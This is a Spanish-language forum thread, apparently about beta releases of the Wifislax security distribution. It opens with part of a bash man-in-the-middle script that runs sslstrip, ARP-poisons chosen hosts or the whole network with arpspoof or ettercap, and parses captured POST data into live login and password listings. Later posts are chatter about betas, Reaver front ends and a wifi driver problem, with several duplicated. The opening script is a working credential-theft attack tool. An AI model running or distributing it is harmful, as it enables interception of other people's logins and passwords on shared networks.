filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
chmod +x $sslstrip_dir/sslstrip.py #make it executable
fi
$sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi
sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m
Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 1) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
echo -e "\nDo you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]];then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else
echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi()
{ # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ];do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$gateway/ /$1/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$etter" = "1" ]];then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$etter" = "1" ]];then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
[/spoiler]
-
No queria meterme en estos dialogos... jajaj!! Pero mis felicitaciones!! habeis cogido un script y lo habeis mejorado hasta este punto que es algo alucinante!! Usuarionuevo despues de la paliza que te acabas de dar y geminis_demon... yo creo que es necesario que subas la nueva beta que estoy deseando probar!!!
PD: Una aplicacion que no vi.... fue la de reaver gui!! yo la solia utilizar mucho... pero que sino crees que sea necesaria me aplico y me pongo manos con el reaver de comandos... que no pasa nada jaja!!
-
si estos chavales con el esfuerso y las ganas que ponen en cada trabajo si estuvieran en las olimpiadas se llevarian todas las medallas ,pero para nuestra suerte esta entre nosotros y sin pedir nada a cambio ,seguid 100pre asi que son unos verdaderos crack >:( >:( >:( >:( salu2
-
No queria meterme en estos dialogos... jajaj!! Pero mis felicitaciones!! habeis cogido un script y lo habeis mejorado hasta este punto que es algo alucinante!! Usuarionuevo despues de la paliza que te acabas de dar y geminis_demon... yo creo que es necesario que subas la nueva beta que estoy deseando probar!!!
PD: Una aplicacion que no vi.... fue la de reaver gui!! yo la solia utilizar mucho... pero que sino crees que sea necesaria me aplico y me pongo manos con el reaver de comandos... que no pasa nada jaja!!
teik , para reaver puedes usar minidwep que lo lleva implementado , puedes usar wifite que lo hace todo el solo , o puedes usar la m4 gui , ...tienes 3 opciones, a parte de la de konsola. , en total 4 opciones. ^-^
-
Me lo estoy bajando.
Menos mal que habeis vuelto al 32bits!!! Ya que el 64 bits no me funcionaba en un portatil mega antiguo!!!
Me gusta hacer las pruebas con ese portatil ya que si le pasa algo, no me enfadaría por mi cagada.
Gracias chicos!!
-
Vamos por la beta 4, así que descargate esa.
yo también estoy en el móvil
saludos
-
Antes que nada me disculpo si lo he empesado un hilo que ya esta resuelto, no soy muy practico en esto de los foros, mi duda es que he intentado con wifislax 4.2 beta 3 y 4 y no lobro hacer funcionar mi tarjeta de red wifi es una laptop aspire one enciente el indicador de wifi puedo ver las redes disponibles, le introdusco la contraceña q uso para conectarme usando WIN 7 y me dice error de contraceña. Si la conecto con cable entra bien el internet, si uso beini 1 2 3 funciona a la perfeccion. Si uso porteus funciona perfectamente, pero en wifislax 4.2 beta 3 y 4 me he pasado horas descargando archivos y nada de nada (broadcom 4312) , podrian darme una manito, soy uno mas tratando de migrar de windows a linux les agradeceria cualquier ayuda que me pueda ofrecer
-
Antes que nada me disculpo si lo he empesado un hilo que ya esta resuelto, no soy muy practico en esto de los foros, mi duda es que he intentado con wifislax 4.2 beta 3 y 4 y no lobro hacer funcionar mi tarjeta de red wifi es una laptop aspire one enciente el indicador de wifi puedo ver las redes disponibles, le introdusco la contraceña q uso para conectarme usando WIN 7 y me dice error de contraceña. Si la conecto con cable entra bien el internet, si uso beini 1 2 3 funciona a la perfeccion. Si uso porteus funciona perfectamente, pero en wifislax 4.2 beta 3 y 4 me he pasado horas descargando archivos y nada de nada (broadcom 4312) , podrian darme una manito, soy uno mas tratando de migrar de windows a linux les agradeceria cualquier ayuda que me pueda ofrecer
hay que fijarse en como configuramos wicd.
HEX O ASCII
WEP / WPA
PASSPHRASE
-
hecho esto sin problemas entra a internet
lo probe en dos laptops distintas con broadcom y chip atheros distintos, y todo ok 100%
hay que fijarse en como configuramos wicd.
HEX O ASCII
WEP / WPA
PASSPHRASE
pregunta... 1-desintalar el firefox y instalar el google chrome
2- instalacion de nuevos programas
grax de ante manos,
-
hecho esto sin problemas entra a internet
lo probe en dos laptops distintas con broadcom y chip atheros distintos, y todo ok 100%
hay que fijarse en como configuramos wicd.
HEX O ASCII
WEP / WPA
PASSPHRASE
pregunta... 1-desintalar el firefox y instalar el google chrome
2- instalacion de nuevos programas
grax de ante manos,
newuser cierra el tema
estoy pensando que como dejes la 4.2 sin ningun bug o algo emocionante que arreglar el futuro nos depara este tipo de cuestiones :P
chumpy se va a jartar de echar broncas y sermones ^-^
-
OK, a partir de ahora por cada beta . cerrare el post anterior.
ADEMAS ,ESTO ES PARA BUSCAR BUGS A LA DISTRO.
que afortunadamente han salido y hemos reparado , a la espera de que no salga nada mas grave.